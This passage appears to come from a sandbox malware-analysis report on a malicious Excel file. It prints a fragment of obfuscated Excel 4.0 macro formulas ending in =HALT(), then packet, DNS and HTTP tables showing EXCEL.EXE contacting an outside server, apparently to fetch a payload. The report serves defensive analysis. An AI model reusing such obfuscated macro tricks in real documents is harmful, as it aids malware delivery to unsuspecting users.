ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=Docs1!$AX$27()",,,,,
=HALT()
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 7, 2021 00:40:04.612869024 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:04.799949884 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:04.800050020 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:04.807867050 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:04.996253967 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.259238005 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.259294033 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.259332895 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.259372950 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.259413004 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.259449959 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.259459972 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.259485960 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.259494066 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.259501934 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.259541988 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.259541988 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.259576082 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.259582996 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.259613991 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.259625912 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.259670973 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.259691954 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.269365072 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.444904089 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.444964886 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.445004940 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.445044994 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.445082903 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.445122004 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.445163012 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.445130110 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.445211887 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.445257902 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.445272923 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.445287943 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.445295095 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.445297956 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.445333958 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.445338011 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.445379972 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.445413113 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.445460081 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.445463896 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.445499897 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.445503950 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.445513010 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.445538998 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.445574999 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.445578098 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.445594072 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.445636034 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.445643902 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.445683002 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.445720911 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.445720911 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.445754051 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.445770979 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.445796013 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.445828915 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.450109959 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.632790089 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.632855892 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.632895947 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.632936001 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.633045912 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.633050919 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.633084059 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.633097887 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.633111000 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.633141994 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.633183002 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.633200884 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.633214951 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.633227110 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.633270979 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.633295059 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.633304119 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.633310080 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.633351088 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.633378029 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.633409023 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.633416891 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.633418083 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.633462906 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.633476973 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.633505106 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.633523941 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.633543968 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.633549929 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.633584976 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.633625031 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.633642912 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.633651972 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.633663893 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.633699894 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.633713007 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.633745909 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.633757114 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.633790016 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 7, 2021 00:40:04.542113066 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 7, 2021 00:40:04.590847969 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Apr 7, 2021 00:40:04.542113066 CEST | 192.168.2.22 | 8.8.8.8 | 0x2c09 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 7, 2021 00:40:04.590847969 CEST | 8.8.8.8 | 192.168.2.22 | 0x2c09 | No error (0) | 192.232.249.186 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49165 | 192.232.249.186 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 7, 2021 00:40:04.807867050 CEST | 0 | OUT | |
Apr 7, 2021 00:40:05.259238005 CEST | 2 | IN |